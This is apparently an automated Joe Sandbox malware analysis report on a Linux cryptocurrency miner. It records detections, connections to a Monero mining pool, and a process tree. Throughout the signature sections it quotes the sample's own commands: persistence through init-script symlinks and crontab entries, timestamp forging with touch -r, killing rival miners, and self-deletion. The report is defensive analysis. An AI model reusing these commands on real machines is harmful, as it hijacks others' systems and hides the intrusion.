Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:570664
Start time:15:19:08
Joe Sandbox Product:Cloud
Start date:31.05.2018
Overall analysis duration:0h 3m 52s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:coinminer
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:CentOS Linux 7.4 x64 (Kernel 3.10.0-693, Firefox 52.6.0, Document Viewer 3.22.1)
Detection:MAL
Classification:mal80.evad.mine.troj.lin@0/12@2/0

Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: /usr/bin/wipefsAvira: Label: PUA/Linux.CoinMiner.mpona
Antivirus detection for submitted fileShow sources
Source: coinminerAvira: Label: PUA/Linux.CoinMiner.mpona

Bitcoin Miner:

barindex
Found strings related to Crypto-MiningShow sources
Source: coinminerString found in binary or memory: ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1
Source: coinminerString found in binary or memory: ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1
Source: coinminerString found in binary or memory: cryptonight

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.101:39526 -> 163.17.30.212:8525
Source: global trafficTCP traffic: 192.168.1.101:55686 -> 37.59.43.131:4444
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: pool.minexmr.com
Urls found in memory or binary dataShow sources
Source: coinminerString found in binary or memory: file://
Source: coinminerString found in binary or memory: file://hostname/
Source: coinminerString found in binary or memory: ftp://
Source: coinminerString found in binary or memory: ftp://%s:%s
Source: coinminerString found in binary or memory: ftp://;type=;type=%cAccept:Could
Source: coinminerString found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: coinminerString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html

Persistence and Installation Behavior:

barindex
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 5925)Rm executable: /bin/rm -> rm /tmp/tmpnam_KEKnmE
Sample tries to persist itself using System V runlevelsShow sources
Source: /bin/cp (PID: 5606)File: /etc/rc.d/init.d/acpidtd
Source: /bin/ln (PID: 5617)File: /etc/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5625)File: /etc/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5633)File: /etc/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5642)File: /etc/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5650)File: /etc/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5659)File: /etc/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5668)File: /etc/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5677)File: /etc/rc.d/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5677)File: /etc/rc.d/rc0.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5685)File: /etc/rc.d/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5685)File: /etc/rc.d/rc1.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5696)File: /etc/rc.d/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5696)File: /etc/rc.d/rc2.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5705)File: /etc/rc.d/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5705)File: /etc/rc.d/rc3.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5714)File: /etc/rc.d/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5714)File: /etc/rc.d/rc4.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5722)File: /etc/rc.d/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5722)File: /etc/rc.d/rc5.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5736)File: /etc/rc.d/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5736)File: /etc/rc.d/rc6.d/S01acpidtd -> /etc/init.d/acpidtd
Source: /bin/ln (PID: 5481)File: /etc/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5490)File: /etc/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5498)File: /etc/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5507)File: /etc/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5520)File: /etc/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5529)File: /etc/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5538)File: /etc/rc6.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5546)File: /etc/rc.d/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5546)File: /etc/rc.d/rc0.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5556)File: /etc/rc.d/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5556)File: /etc/rc.d/rc1.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5565)File: /etc/rc.d/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5565)File: /etc/rc.d/rc2.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5573)File: /etc/rc.d/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5573)File: /etc/rc.d/rc3.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5581)File: /etc/rc.d/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5581)File: /etc/rc.d/rc4.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5590)File: /etc/rc.d/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5590)File: /etc/rc.d/rc5.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5599)File: /etc/rc.d/rc6.d/S01wipefs -> /etc/init.d/wipefs
Source: /bin/ln (PID: 5599)File: /etc/rc.d/rc6.d/S01wipefs -> /etc/init.d/wipefs
Sample tries to persist itself using cronShow sources
Source: /bin/sh (PID: 5632)File: /etc/crontab
Executes commands using a shell command-line interpreterShow sources
Source: /tmp/coinminer (PID: 5461)Shell command executed: sh -c "/tmp/tmpnam_KEKnmE upgrade >/dev/null 2>&1; rm /tmp/tmpnam_KEKnmE >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5455)Shell command executed: sh -c "cp -f /tmp/coinminer /bin/wipefs>/dev/null 2>&1\nln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipef"
Source: /tmp/coinminer (PID: 5618)Shell command executed: sh -c "cat /etc/crontab"
Source: /tmp/coinminer (PID: 5632)Shell command executed: sh -c "echo '0 */6 * * * root /bin/wipefs' >> /etc/crontab"
Source: /tmp/coinminer (PID: 5640)Shell command executed: sh -c "sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5667)Shell command executed: sh -c "sysctl -p >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 5694)Shell command executed: sh -c "(touch /tmp/tmplog; chmod 666 /tmp/tmplog) >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6121)Shell command executed: sh -c "ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1"
Source: /tmp/coinminer (PID: 6218)Shell command executed: sh -c "ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1"
Executes the "chmod" command used to modify permissionsShow sources
Source: /tmp/tmpnam_KEKnmE (PID: 5595)Chmod executable: /bin/chmod -> chmod +x /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5827)Chmod executable: /bin/chmod -> chmod +x /bin/scnetstat
Source: /bin/sh (PID: 5724)Chmod executable: /bin/chmod -> chmod 666 /tmp/tmplog
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /tmp/tmpnam_KEKnmE (PID: 5828)Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5848)Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6170)Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6174)Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6267)Grep executable: /bin/grep -> grep processor /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6271)Grep executable: /bin/grep -> grep "model name" /proc/cpuinfo
Source: /bin/sh (PID: 6123)Grep executable: /bin/grep -> grep stratum+tcp
Source: /bin/sh (PID: 6220)Grep executable: /bin/grep -> grep stratum+tcp
Executes the "kill" command typically used to terminate processesShow sources
Source: /bin/xargs (PID: 6129)Kill executable: /bin/kill -> kill -9 6121 6123
Source: /bin/xargs (PID: 6224)Kill executable: /bin/kill -> kill -9 6218 6220
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 6122)Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 6219)Ps executable: /bin/ps -> ps -ef
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /tmp/tmpnam_KEKnmE (PID: 5584)Touch executable: /bin/touch -> touch -r /bin/sh /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd
Source: /tmp/tmpnam_KEKnmE (PID: 5641)Touch executable: /bin/touch -> touch -r /bin/sh /sbin/ss /sbin/scss
Source: /tmp/tmpnam_KEKnmE (PID: 5854)Touch executable: /bin/touch -> touch -r /bin/sh /bin/netstat /bin/scnetstat
Source: /bin/sh (PID: 5609)Touch executable: /bin/touch -> touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs /etc/rc.d/rc1.d/S01wipefs /etc/rc.d/rc2.d/S01wipefs /etc/rc.d/rc3.d/S01wipefs /etc/rc.d/rc4.d/S01wipefs /etc/rc.d/rc5.d/S01wipefs /etc/rc.d/rc6.d/S01wipefs
Source: /bin/sh (PID: 5711)Touch executable: /bin/touch -> touch /tmp/tmplog
Reads system information from the proc file systemShow sources
Source: /bin/sh (PID: 5461)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5488)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5497)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5515)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5524)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5548)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5558)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5584)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5749)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5766)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5774)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5790)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5798)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5820)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5828)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5839)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 5848)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 5860)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6169)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6170)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6173)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6174)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6176)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 6266)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6267)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6270)Reads from proc file: /proc/meminfo
Source: /bin/grep (PID: 6271)Reads from proc file: /proc/cpuinfo
Source: /tmp/tmpnam_KEKnmE (PID: 6273)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5473)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5489)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5499)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5522)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5530)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5550)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5559)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5585)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5607)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5649)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5666)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5675)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5688)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5693)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5712)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5729)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5747)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5763)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5772)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5789)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5797)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5818)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5837)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5862)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5877)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5884)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5898)Reads from proc file: /proc/meminfo
Source: /tmp/tmpnam_KEKnmE (PID: 5909)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5455)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5618)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5632)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5640)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5667)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 5694)Reads from proc file: /proc/meminfo
Source: /bin/sh (PID: 6121)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6122)Reads from proc file: /proc/stat
Source: /bin/sh (PID: 6218)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 6219)Reads from proc file: /proc/stat
Sample tries to set the executable flagShow sources
Source: /tmp/coinminer (PID: 5454)File: /tmp/tmpnam_KEKnmE (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5595)File: /sbin/scss (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 5827)File: /bin/scnetstat (bits: - usr: rx grp: rx all: rwx)

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: w L3T$
Source: Initial samplePotential command found: ps -ef | grep stratum+tcp | awk '{print $2}' | xargs kill -9 >/dev/null 2>&1
Source: Initial samplePotential command found: sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
Source: Initial samplePotential command found: cd ~/ && cp -f %s .wipefs &&(crontab -l; echo "0 */6 * * * `pwd`/.wipefs") | crontab - >/dev/null 2>&1
Source: Initial samplePotential command found: echo '0 */6 * * * root /bin/wipefs' >> /etc/crontab
Source: Initial samplePotential command found: cat /etc/crontab
Source: Initial samplePotential command found: sysctl -p >/dev/null 2>&1
Source: Initial samplePotential command found: crontab -l
Source: Initial samplePotential command found: X []A\A]A^A_
Source: Initial samplePotential command found: X %FuI
Source: Initial samplePotential command found: X Fu
Source: Initial samplePotential command found: w FuI1K
Source: Initial samplePotential command found: w VG.%_
Source: Initial samplePotential command found: ftp server doesn't support SIZE
Source: Initial samplePotential command found: cp -f %s /bin/wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc0.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc1.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc2.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc3.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc4.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc5.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: ln -fs /etc/init.d/wipefs /etc/rc.d/rc6.d/S01wipefs>/dev/null 2>&1
Source: Initial samplePotential command found: touch -r /bin/sh /bin/wipefs /etc/init.d/wipefs /etc/rc.d/rc*.d/S01wipefs>/dev/null 2>&1
Sample has stripped symbol tableShow sources
Source: ELF static info symbol of initial sample.symtab present: no
Classification labelShow sources
Source: classification engineClassification label: mal80.evad.mine.troj.lin@0/12@2/0

Hooking and other Techniques for Hiding and Protection:

barindex
Sample deletes itselfShow sources
Source: /bin/rm (PID: 5925)File: /tmp/tmpnam_KEKnmE


Runtime Messages

Command:/tmp/coinminer
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 570664 Sample: coinminer Startdate: 31/05/2018 Architecture: LINUX Score: 80 133 163.17.30.212, 39526, 39530, 39532 ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC Taiwan; Republic of China (ROC) 2->133 135 pool.minexmr.com 37.59.43.131, 4444, 55686 OVHFR France 2->135 137 Antivirus detection for dropped file 2->137 139 Antivirus detection for submitted file 2->139 141 Found strings related to Crypto-Mining 2->141 14 coinminer 2->14         started        signatures3 143 Detected TCP or UDP traffic on non-standard ports 135->143 process4 process5 16 coinminer 14->16         started        19 coinminer sh 14->19         started        21 coinminer 14->21         started        23 5 other processes 14->23 file6 127 /tmp/tmpnam_KEKnmE, ELF 16->127 dropped 26 coinminer sh 16->26         started        28 sh ln 19->28         started        31 sh ln 19->31         started        33 sh ln 19->33         started        41 14 other processes 19->41 35 coinminer sh 21->35         started        37 coinminer sh 21->37         started        129 /etc/crontab, ASCII 23->129 dropped 147 Sample tries to persist itself using cron 23->147 39 sh 23->39         started        44 2 other processes 23->44 signatures7 process8 file9 46 sh tmpnam_KEKnmE 26->46         started        48 sh rm 26->48         started        153 Sample tries to persist itself using System V runlevels 28->153 51 sh xargs 35->51         started        53 sh ps 35->53         started        61 2 other processes 35->61 55 sh xargs 37->55         started        63 3 other processes 37->63 57 sh touch 39->57         started        59 sh chmod 39->59         started        131 /usr/bin/wipefs, ELF 41->131 dropped signatures10 process11 signatures12 65 tmpnam_KEKnmE 46->65         started        67 tmpnam_KEKnmE 46->67         started        69 tmpnam_KEKnmE 46->69         started        75 26 other processes 46->75 149 Sample deletes itself 48->149 151 Executes the "rm" command used to delete files or directories 48->151 71 xargs kill 51->71         started        73 xargs kill 55->73         started        process13 process14 77 tmpnam_KEKnmE 65->77         started        79 tmpnam_KEKnmE cp 67->79         started        81 tmpnam_KEKnmE touch 67->81         started        83 tmpnam_KEKnmE cp 69->83         started        85 tmpnam_KEKnmE touch 69->85         started        87 tmpnam_KEKnmE which 75->87         started        89 tmpnam_KEKnmE which 75->89         started        91 tmpnam_KEKnmE which 75->91         started        93 13 other processes 75->93 process15 95 tmpnam_KEKnmE 77->95         started        process16 97 tmpnam_KEKnmE touch 95->97         started        99 tmpnam_KEKnmE 95->99         started        101 tmpnam_KEKnmE 95->101         started        103 17 other processes 95->103 process17 105 tmpnam_KEKnmE cp 97->105         started        109 tmpnam_KEKnmE ln 97->109         started        111 tmpnam_KEKnmE ln 97->111         started        117 13 other processes 97->117 119 3 other processes 99->119 121 3 other processes 101->121 113 tmpnam_KEKnmE which 103->113         started        115 tmpnam_KEKnmE which 103->115         started        123 13 other processes 103->123 file18 125 /etc/rc.d/init.d/acpidtd, ELF 105->125 dropped 145 Sample tries to persist itself using System V runlevels 105->145 signatures19

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
coinminer100%AviraPUA/Linux.CoinMiner.mpona

Dropped Files

SourceDetectionScannerLabelLink
/usr/bin/wipefs100%AviraPUA/Linux.CoinMiner.mpona

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxcentos1
  • coinminer (PID: 5451, Parent: 5410, MD5: 9a0629bbb97ef2c2fd8369778aa9a0d3)
    • coinminer New Fork (PID: 5454, Parent: 5451)
      • sh (PID: 5461, Parent: 5454, MD5: df0d31d6acbb7862916223a26cc45da0)
        • sh New Fork (PID: 5465, Parent: 5461)
        • tmpnam_KEKnmE (PID: 5465, Parent: 5461, MD5: eafef5b086d1e5940ab27a617e48b7c4)
          • tmpnam_KEKnmE New Fork (PID: 5472, Parent: 5465)
            • tmpnam_KEKnmE New Fork (PID: 5479, Parent: 5472)
              • tmpnam_KEKnmE New Fork (PID: 5488, Parent: 5479)
                • tmpnam_KEKnmE New Fork (PID: 5497, Parent: 5488)
                  • which (PID: 5506, Parent: 5497, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5515, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5524, Parent: 5488)
                  • which (PID: 5537, Parent: 5524, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5548, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5558, Parent: 5488)
                  • chattr (PID: 5567, Parent: 5558, MD5: 429aabf876ae1d2fa2459219366d273c)
                • tmpnam_KEKnmE New Fork (PID: 5584, Parent: 5488)
                  • cp (PID: 5597, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
                  • cp (PID: 5606, Parent: 5584, MD5: afc7c3ab2546d6d8a98854dcaaa731b3)
                  • ln (PID: 5617, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5625, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5633, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5642, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5650, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5659, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5668, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5677, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5685, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5696, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5705, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5714, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5722, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                  • ln (PID: 5736, Parent: 5584, MD5: 1b38975800862fdf2d2c8165ed30690b)
                • touch (PID: 5584, Parent: 5488, MD5: 985a951b1a7a8dbe51973e651a365900)
                • tmpnam_KEKnmE New Fork (PID: 5749, Parent: 5488)
                  • which (PID: 5757, Parent: 5749, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5766, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5774, Parent: 5488)
                  • which (PID: 5782, Parent: 5774, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • which (PID: 5790, Parent: 5488, MD5: 8fb996e3ef12e5c65a3f47efca700ec3)
                • tmpnam_KEKnmE New Fork (PID: 5798, Parent: 5488)
                  • chattr (PID: 5806, Parent: 5798, MD5: 429aabf876ae1d2fa2459219366d273c)
                • tmpnam_KEKnmE New Fork (PID: 5820, Parent: 5488)
                  • grep (PID: 5828, Parent: 5820, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 5829, Parent: 5820, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 5830, Parent: 5820, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 5839, Parent: 5488)
                  • grep (PID: 5848, Parent: 5839, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 5849, Parent: 5839, MD5: a83f5f379d810462d528dc460d63a04b)
                • uname (PID: 5860, Parent: 5488, MD5: 81136bf3b923238a5420a003d585a68f)
                • tmpnam_KEKnmE New Fork (PID: 6169, Parent: 5488)
                  • grep (PID: 6170, Parent: 6169, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
                  • uniq (PID: 6171, Parent: 6169, MD5: a83f5f379d810462d528dc460d63a04b)
                  • wc (PID: 6172, Parent: 6169, MD5: 1304115f965d6c9062947a3b35d9e140)
                • tmpnam_KEKnmE New Fork (PID: 6173, Parent: 5488)
                  • grep (PID: 6174, Parent: 6173, MD5: 6cd81dedcf076b9ad7cfbfec976245d5)
